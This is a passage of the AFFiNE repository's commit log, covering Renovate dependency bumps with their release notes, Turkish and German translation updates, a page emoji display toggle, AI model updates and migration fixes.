  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 06:29:05 +08:00
SkyLostTR eecd0a2169 feat(i18n): add Turkish translation (#15000)
This pull request introduces support for the Turkish language to the
frontend internationalization system and adds a new pull request
template to standardize PR descriptions. The main changes are grouped
below:

**Internationalization: Turkish Language Support**
* Added `'tr'` (Turkish) to the `Language` type and
`SUPPORTED_LANGUAGES` object in `index.ts`, including its display name,
native name, flag emoji, and resource loader.
[[1]](diffhunk://#diff-ba5f665c3490d0f5acb2cb70f08314c5373137fa8085ab05175047f10cb7fdf8L26-R27)
[[2]](diffhunk://#diff-ba5f665c3490d0f5acb2cb70f08314c5373137fa8085ab05175047f10cb7fdf8R183-R188)
* Updated `i18n-completenesses.json` to include Turkish (`"tr": 6`).

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * Turkish language can now be selected in the app.

* **Localization**
* Initial Turkish translations added and translation completeness set to
100%.
* Locale metadata added (display name, original name, flag) for Turkish.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15000?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-24 06:19:06 +08:00
steffenrapp f2980503b4 fix(editor): sorting of page emoji display toggle (#15020)
Fixes the order of the new setting toggle introduced in #14999.
It appeared between "Auto-title new docs with current date" and "New doc
date format" which both belong together.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Style**
* Repositioned the "display add icon option" setting within General
settings for improved interface organization and logical grouping.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15020?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-24 00:06:21 +08:00
steffenrapp 925c95ce88 feat(i18n): update German translation (#15011)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Localization**
  * German language completeness raised to 100%.
* Added German translations for Markdown export/copy labels and success
text, import formats (including Bear backup and Word .docx), editor
settings (auto-date-title formats, add-icon option), AI BYOK
workspace/provider-key UI and notifications, and a recording/importing
UI prompt.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15011?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-22 01:33:38 +08:00
DarkSky 3098b3b14b feat(server): bump models (#15013)
#### PR Dependency Tree


* **PR #15013** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Expanded AI capabilities with the addition of Gemini 3.5 Flash model,
providing enhanced options for AI-powered features.

* **Updates**
* Updated Claude Sonnet to the latest version for improved performance.
  * Refreshed pro models configuration with optimized selections.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15013?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-21 15:29:00 +08:00
DarkSky dd1cd77ca0 chore(server): improve migration compatibility (#15014)
#### PR Dependency Tree


* **PR #15014** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Remove orphaned legacy subscription and entitlement records during
backfill.
* Repair workspaces missing active owners by promoting eligible members
and cleaning up empty workspaces.
* Skip cloud subscription backfill when target user/workspace no longer
exists to avoid dangling data.

* **Tests**
  * Added tests verifying legacy data cleanup during backfill.
* Added tests verifying workspace ownership repair and migration
behavior.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/15014?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-21 15:28:51 +08:00
Waqar Bin zafar d20dbfd6a2 feat(editor): add page emoji display toggle #14987 (#14999)
This PR adds a display toggle for Page Emoji, so users can choose
whether the add emoji option is shown in the page header when no emoji
is set.

What changed
read editor setting for display add icon option
hide emoji placeholder entry when the setting is disabled
keep existing behavior for readonly mode and for pages that already have
an emoji
Why
This implements the feature request to control Page Emoji visibility and
improves header cleanliness for users who prefer a minimal UI.

Issue
Closes #14093
<img width="1277" height="726" alt="Screenshot 2026-05-19 at 3 44 14 PM"
src="https://github.com/user-attachments/assets/caa29272-35c0-410d-bd54-2e038e4e0db2"
/>
<img width="1511" height="779" alt="Screenshot 2026-05-19 at 3 44 35 PM"
src="https://github.com/user-attachments/assets/3504136a-d34c-45cc-992b-0056b018ff92"
/>

Testing
verified in editable mode:
setting ON: add emoji placeholder is visible when page has no emoji
setting OFF: add emoji placeholder is hidden when page has no emoji
verified in readonly mode:
no emoji: nothing shown
with emoji: existing emoji is shown
verified no regression for selecting/changing/removing emoji
Screenshots
I will attach screenshots in this section.

Quick rule checks before submit

Base branch is canary.
PR title follows conventional format: type(scope): subject.
Scope editor is valid for this repo.
Include Closes #14093 in the body.
Add your screenshots before creating or right after opening the PR.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added an editor setting to toggle whether the "add icon" option is
shown when creating new documents (default: enabled).
* **User Experience**
* When disabled, the add-icon trigger is hidden for documents that use a
placeholder icon; readonly display remains unchanged.
* **Tests**
  * Updated tests to cover the new setting and toggle behavior.
* **Localization**
* Added translations and updated i18n typings and completeness metrics.

<!-- review_stack_entry_start -->

[![Review Change
Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14999?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-20 22:20:12 +08:00
renovate[bot] 41145961f9 chore: bump up RevenueCat/purchases-ios-spm version to from: "5.73.0" (#15008)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.66.0"` → `from: "5.73.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.73.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5730)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.72.0...5.73.0)

#### 5.73.0

###
[`v5.72.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5720)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.71.0...5.72.0)

#### 5.72.0

###
[`v5.71.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5710)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.70.0...5.71.0)

#### 5.71.0

###
[`v5.70.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5700)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.69.0...5.70.0)

#### 5.70.0

###
[`v5.69.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5690)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.68.0...5.69.0)

#### 5.69.0

###
[`v5.68.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5680)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.2...5.68.0)

#### 5.68.0

###
[`v5.67.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5672)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.1...5.67.2)

#### 5.67.2

###
[`v5.67.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5671)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.0...5.67.1)

#### 5.67.1

###
[`v5.67.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5670)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.66.0...5.67.0)

#### 5.67.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 18:41:32 +08:00
DarkSky 1f2119e273 fix: migration timeout 2026-05-20 18:39:08 +08:00
renovate[bot] 6e97aff7ba chore: bump up oxlint-tsgolint version to ^0.23.0 (#15007)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint-tsgolint](https://redirect.github.com/oxc-project/tsgolint) |
[`^0.19.0` →
`^0.23.0`](https://renovatebot.com/diffs/npm/oxlint-tsgolint/0.19.0/0.23.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint-tsgolint/0.23.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint-tsgolint/0.19.0/0.23.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/tsgolint (oxlint-tsgolint)</summary>

###
[`v0.23.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.23.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0)

#### What's Changed

- chore(deps): update crate-ci/typos action to v1.45.2 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;915](https://redirect.github.com/oxc-project/tsgolint/pull/915)
- feat: add skill for upgrading typescript-go by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;918](https://redirect.github.com/oxc-project/tsgolint/pull/918)
- chore(deps): update pnpm to v10.33.2 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;921](https://redirect.github.com/oxc-project/tsgolint/pull/921)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;922](https://redirect.github.com/oxc-project/tsgolint/pull/922)
- fix: attach tsconfig path to diagnostics by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;923](https://redirect.github.com/oxc-project/tsgolint/pull/923)
- fix(prefer-nullish-coalescing): parenthesize mixed logical fixes by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;924](https://redirect.github.com/oxc-project/tsgolint/pull/924)
- tests(return-await): cover non-async arrow functions by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;926](https://redirect.github.com/oxc-project/tsgolint/pull/926)
- chore(deps): update github.com/go-json-experiment/json digest to
[`b6187a3`](https://redirect.github.com/oxc-project/tsgolint/commit/b6187a3)
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;927](https://redirect.github.com/oxc-project/tsgolint/pull/927)
- chore(deps): update github actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;928](https://redirect.github.com/oxc-project/tsgolint/pull/928)
- chore(deps): update crate-ci/typos action to v1.46.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;929](https://redirect.github.com/oxc-project/tsgolint/pull/929)
- chore(deps): update module github.com/dlclark/regexp2 to v2 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;930](https://redirect.github.com/oxc-project/tsgolint/pull/930)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;931](https://redirect.github.com/oxc-project/tsgolint/pull/931)
- chore(deps): update typescript-go digest to
[`48e2953`](https://redirect.github.com/oxc-project/tsgolint/commit/48e2953)
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;933](https://redirect.github.com/oxc-project/tsgolint/pull/933)
- chore(deps): update typescript-go digest to
[`5eb880f`](https://redirect.github.com/oxc-project/tsgolint/commit/5eb880f)
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;936](https://redirect.github.com/oxc-project/tsgolint/pull/936)
- fix(no-misused-promises): handle empty JSX attributes by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;938](https://redirect.github.com/oxc-project/tsgolint/pull/938)
- fix(no-unsafe-enum-comparison): flag string literal unions by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;937](https://redirect.github.com/oxc-project/tsgolint/pull/937)
- chore(deps): update typescript-go digest to
[`e1f8f97`](https://redirect.github.com/oxc-project/tsgolint/commit/e1f8f97)
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;939](https://redirect.github.com/oxc-project/tsgolint/pull/939)
- chore(deps): update typescript-go digest to
[`092b34f`](https://redirect.github.com/oxc-project/tsgolint/commit/092b34f)
by [@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;940](https://redirect.github.com/oxc-project/tsgolint/pull/940)
- chore: configure typescript-go renovate schedule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;941](https://redirect.github.com/oxc-project/tsgolint/pull/941)
- chore(deps): update github actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;945](https://redirect.github.com/oxc-project/tsgolint/pull/945)
- chore(deps): update dependency dprint-typescript to v0.96.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;947](https://redirect.github.com/oxc-project/tsgolint/pull/947)
- chore(deps): update gomod by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;946](https://redirect.github.com/oxc-project/tsgolint/pull/946)
- chore(deps): update crate-ci/typos action to v1.46.1 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;948](https://redirect.github.com/oxc-project/tsgolint/pull/948)
- fix(prefer-nullish-coalescing): emit suggestion over fix by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;951](https://redirect.github.com/oxc-project/tsgolint/pull/951)
- chore: update packageManager to pnpm 11.0.4 by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;953](https://redirect.github.com/oxc-project/tsgolint/pull/953)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;955](https://redirect.github.com/oxc-project/tsgolint/pull/955)
- fix(no-nullable-type-assertion-style): use suggestion instead of fix
by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;956](https://redirect.github.com/oxc-project/tsgolint/pull/956)
- docs: Update Go version requirement to 1.26 in CONTRIBUTING.md. by
[@&#8203;connorshea](https://redirect.github.com/connorshea) in
[#&#8203;957](https://redirect.github.com/oxc-project/tsgolint/pull/957)
- fix: allow safe promise intersection members by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;959](https://redirect.github.com/oxc-project/tsgolint/pull/959)
- ci: switch security workflow to ubuntu-latest by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;962](https://redirect.github.com/oxc-project/tsgolint/pull/962)
- chore(deps): update dependency vitest to v4.1.6 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;963](https://redirect.github.com/oxc-project/tsgolint/pull/963)
- chore(deps): update module github.com/dlclark/regexp2/v2 to v2.0.3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;964](https://redirect.github.com/oxc-project/tsgolint/pull/964)
- chore(deps): update dependency dprint-markdown to v0.22.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;965](https://redirect.github.com/oxc-project/tsgolint/pull/965)
- chore(deps): update github actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;966](https://redirect.github.com/oxc-project/tsgolint/pull/966)
- perf(no-unnecessary-type-parameters): stop counting settled candidates
by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;967](https://redirect.github.com/oxc-project/tsgolint/pull/967)
- chore: add `dprint` to pnpm `allowBuilds` by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;968](https://redirect.github.com/oxc-project/tsgolint/pull/968)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0>

###
[`v0.22.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.1)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1)

#### What's Changed

- fix: clarify `AGENTS.md` submodule guidance by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;909](https://redirect.github.com/oxc-project/tsgolint/pull/909)
- feat(no-unsafe-enum-comparison): implement suggestion by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;910](https://redirect.github.com/oxc-project/tsgolint/pull/910)
- feat(no-unnecessary-template-expression): implement fix by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;911](https://redirect.github.com/oxc-project/tsgolint/pull/911)
- chore(deps): update dependency vitest to v4.1.5 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;912](https://redirect.github.com/oxc-project/tsgolint/pull/912)
- chore(deps): update github-actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;913](https://redirect.github.com/oxc-project/tsgolint/pull/913)
- fix(prefer-optional-chain): avoid access comparison false positive by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;914](https://redirect.github.com/oxc-project/tsgolint/pull/914)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.22.0...v0.22.1>

###
[`v0.22.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.22.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0)

#### What's Changed

- chore: convert renovate config to json by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;893](https://redirect.github.com/oxc-project/tsgolint/pull/893)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;895](https://redirect.github.com/oxc-project/tsgolint/pull/895)
- ci: replace OXC\_BOT\_PAT with GitHub App tokens by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;894](https://redirect.github.com/oxc-project/tsgolint/pull/894)
- ci: add security analysis workflow by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;898](https://redirect.github.com/oxc-project/tsgolint/pull/898)
- chore(deps): update github-actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;899](https://redirect.github.com/oxc-project/tsgolint/pull/899)
- chore(deps): update module github.com/dlclark/regexp2 to v1.12.0 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;900](https://redirect.github.com/oxc-project/tsgolint/pull/900)
- chore(deps): update dependency typescript to v6.0.3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;901](https://redirect.github.com/oxc-project/tsgolint/pull/901)
- ci: make security analysis required-check friendly by
[@&#8203;Boshen](https://redirect.github.com/Boshen) in
[#&#8203;902](https://redirect.github.com/oxc-project/tsgolint/pull/902)
- feat(require-await): implement suggestions by
[@&#8203;younggglcy](https://redirect.github.com/younggglcy) in
[#&#8203;896](https://redirect.github.com/oxc-project/tsgolint/pull/896)
- fix: add warning for unsupported tsgolint CLI entrypoint by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;903](https://redirect.github.com/oxc-project/tsgolint/pull/903)
- fix: resolve ancestor tsconfig for excluded nearest config by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;904](https://redirect.github.com/oxc-project/tsgolint/pull/904)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;905](https://redirect.github.com/oxc-project/tsgolint/pull/905)
- fix: handle UTF-16 diagnostics by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;906](https://redirect.github.com/oxc-project/tsgolint/pull/906)
- fix(no-useless-default-assignment): make default assignment removal a
suggestion by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;907](https://redirect.github.com/oxc-project/tsgolint/pull/907)
- fix(no-unnecessary-type-arguments): preserve shadowed type arguments
by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;908](https://redirect.github.com/oxc-project/tsgolint/pull/908)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.21.1...v0.22.0>

###
[`v0.21.1`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.1)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1)

##### What's Changed

- fix(no-unnecessary-condition): handle null overlap in narrowed generic
intersections by [@&#8203;camc314](https://redirect.github.com/camc314)
in
[#&#8203;891](https://redirect.github.com/oxc-project/tsgolint/pull/891)
- revert(no-unnecessary-type-arguments): drop inference reporting by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;892](https://redirect.github.com/oxc-project/tsgolint/pull/892)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.21.0...v0.21.1>

###
[`v0.21.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.21.0)

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0)

##### What's Changed

- chore: migrate gen-json-schemas to TS by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;874](https://redirect.github.com/oxc-project/tsgolint/pull/874)
- chore: update typescript-go submodule by
[@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;879](https://redirect.github.com/oxc-project/tsgolint/pull/879)
- chore(deps): update github-actions by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;883](https://redirect.github.com/oxc-project/tsgolint/pull/883)
- chore(deps): update gomod by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;884](https://redirect.github.com/oxc-project/tsgolint/pull/884)
- chore(deps): update npm packages by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;885](https://redirect.github.com/oxc-project/tsgolint/pull/885)
- feat: improve `consistent-type-exports` diagnostics quality by
[@&#8203;camchenry](https://redirect.github.com/camchenry) in
[#&#8203;880](https://redirect.github.com/oxc-project/tsgolint/pull/880)
- chore(deps): update softprops/action-gh-release action to v3 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;886](https://redirect.github.com/oxc-project/tsgolint/pull/886)
- feat: enrich the `no-array-delete` diagnostic by
[@&#8203;camchenry](https://redirect.github.com/camchenry) in
[#&#8203;881](https://redirect.github.com/oxc-project/tsgolint/pull/881)
- feat: enrich `no-duplicate-type-constituents` diagnostic by
[@&#8203;camchenry](https://redirect.github.com/camchenry) in
[#&#8203;882](https://redirect.github.com/oxc-project/tsgolint/pull/882)
- fix(no-meaningless-void-operator): align with typescript-eslint union
handling by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;887](https://redirect.github.com/oxc-project/tsgolint/pull/887)
- chore(deps): update crate-ci/typos action to v1.45.1 by
[@&#8203;renovate](https://redirect.github.com/renovate)\[bot] in
[#&#8203;888](https://redirect.github.com/oxc-project/tsgolint/pull/888)
- fix(no-deprecated): avoid false positive on array destructuring
bindings by [@&#8203;camc314](https://redirect.github.com/camc314) in
[#&#8203;890](https://redirect.github.com/oxc-project/tsgolint/pull/890)

**Full Changelog**:
<https://github.com/oxc-project/tsgolint/compare/v0.20.0...v0.21.0>

### [`v0.20.0`]()

[Compare
Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.19.0...v0.20.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-20 13:17:46 +08:00
renovate[bot] 276b0db625 chore: bump up eslint-plugin-oxlint version to v1.66.0 (#15006)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.64.0` →
`1.66.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.64.0/1.66.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.66.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.64.0/1.66.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.66.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.66.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.65.0...v1.66.0)

###
[`v1.65.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.65.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.64.0...v1.65.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

